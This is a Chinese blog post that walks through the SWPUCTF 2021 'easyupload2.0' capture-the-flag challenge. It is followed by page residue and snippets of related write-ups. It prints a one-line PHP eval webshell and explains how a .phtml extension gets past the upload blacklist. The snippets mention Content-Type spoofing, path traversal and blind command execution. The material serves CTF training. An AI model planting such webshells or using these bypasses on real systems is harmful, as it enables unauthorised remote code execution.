[SWPUCTF 2021 新生赛]easyupload2.0

最新推荐文章于 2024-07-06 18:34:40 发布
最新推荐文章于 2024-07-06 18:34:40 发布
阅读量375 收藏 7
点赞数 8
文章标签: 网络安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80059204/article/details/135083053
版权

[SWPUCTF 2021 新生赛]easyupload2.0

打开靶机后,看到是让上传一个jpg格式的文件,上传一句话木马,文件后缀设置为jpg

<?php @eval($_POST['cmd']);?>

因为要使用php格式(简单说就是给木马一个可执行环境)才能将木马注入成功,把文件后缀改为php再一次发送发现是发送失败的,再一次修改,把文件后缀改为phtml,发现上传成功

蚁剑链接

Lnre
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[SWPUCTF 2021 新生]traditional
03-15
SWPUCTF 2021 新生的传统题目中,我们看到了一道有趣的密码题目,它与八卦图和二进制数学有着紧密的联系。莱布尼茨是西方的二进制数学的发明者,他受到中国的八卦图的启发,演绎并推论出了数学矩阵,最后创造了...
ctf逆向解题——re1-附件资源
03-05
ctf逆向解题——re1-附件资源
NSSCTF | [SWPUCTF 2021 新生]easyupload2.0
2302_80946742的博客
05-15 445
使用Burpsuite抓包只修改ContentType后发现也不能绕过,说明服务器使用了黑名单后缀限制,那么我们可以使用其他的后缀代替php,比如这里使用的phtml,ContentType改为image/jpeg,然后放行。cat命令查看flag.php的内容后发现不是正确的flag,看了别的师傅,原来flag在phpinfo中。与上面的绕过方法一致,传入phpinfo.php文件,然后访问搜索即可得到flag。蚁剑测试成功,但是添加后无法查看目录,我不知道是为什么。可以看到回显,不允许上传php文件。
【CTF】[SWPUCTF 2021 新生]easyupload2.0
西原一点红的博客
06-20 407
响应直接访问,获得flag。
[SWPUCTF 2021 新生]easyupload2.0(前端后缀过滤不完整+一句话木马+蚁剑)
最新发布
2401_84499442的博客
07-06 180
看这里的upload1.jpg,首先我想到先用php配置文件修改jpg文件的属性,让服务器能够解析执行jpg文件.php行不通,那就继续换,经过实验,发现phtml和phtm没有过滤干净。后面的1.phtml是你上传的文件,然后找到flag.php。哦,忘了,这里的一句话木马密码是a,之前忘记说了。首先看标签,明确方向,这是一个文件上传的题目。
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
error message_errormessage_
10-04
在IT行业中,错误处理是软件开发中的重要环节,它确保了程序在遇到问题时能够以适当的方式响应,提供用户友好的反馈。"error message_errormessage_" 这个标题可能是指一个特定的错误处理机制或者函数,其核心是创建...
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
[SWPUCTF 2021]easyupload2.0(WP)
wikey 的博客
03-28 304
我们上传的php不行,百度知道可以用phtml代替php,那就在burp里面改一下就行。Content-Type还是改成image/jpeg。跟1.0版本差不多,用相同方法试试。
nssctf web 入门(5)
qq_61988806的博客
04-17 779
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
[SWPUCTF 2021 新生]第二波放题
weixin_63231007的博客
04-10 3777
[SWPUCTF 2021 新生]easyupload2.0 文件上传,抓包试一下 发现php不行。 和1.0一样,只不过不支持php,用phtml就行了 蚁剑连接,在目录中找到flag。 知识点: 通常,在嵌入了php脚本的html中,使用 phtml作为后缀名; 完全是php写的,则使用php作为后缀名。 这两种文件,web服务器都会用php解释器进行解析。 [SWPUCTF 2021 新生]babyrce hackbar传入一个cookie:admin=1后,看见ra.
NSSCTF
weixin_43896504的博客
07-22 2364
NSSCTF
[SWPUCTF 2021 新生] web
qq_61768489的博客
08-07 3564
简单来说: 检测路径中是否存在%字符,并且如果%后面的两个字符是十六进制字符,就会对后面的两个字符进行url解码转化,如路径中有%2e./,则会解码为../,转换后判断是否存在../,加入路径中使用.%2e/则能绕过,导致目录穿越漏洞,因为当遍历到第一个.时,后面两个字符是%2并不是./,就不会被处理,绕过检测。没有过滤|这个符号,然后exec执行是没有回显的,这个题目是需要用linux的一个命令,”tee“将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来执行这个命令。...
[SWPUCTF 2021 新生]hardrce
07-25
\[SWPUCTF 2021 新生\]hardrce是一个比中的题目,它是一个PHP脚本。这个脚本首先会检查用户传入的参数wllm是否存在,然后会对wllm进行一系列的过滤操作。过滤操作包括去除空格、制表符、回车、换行等特殊字符,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值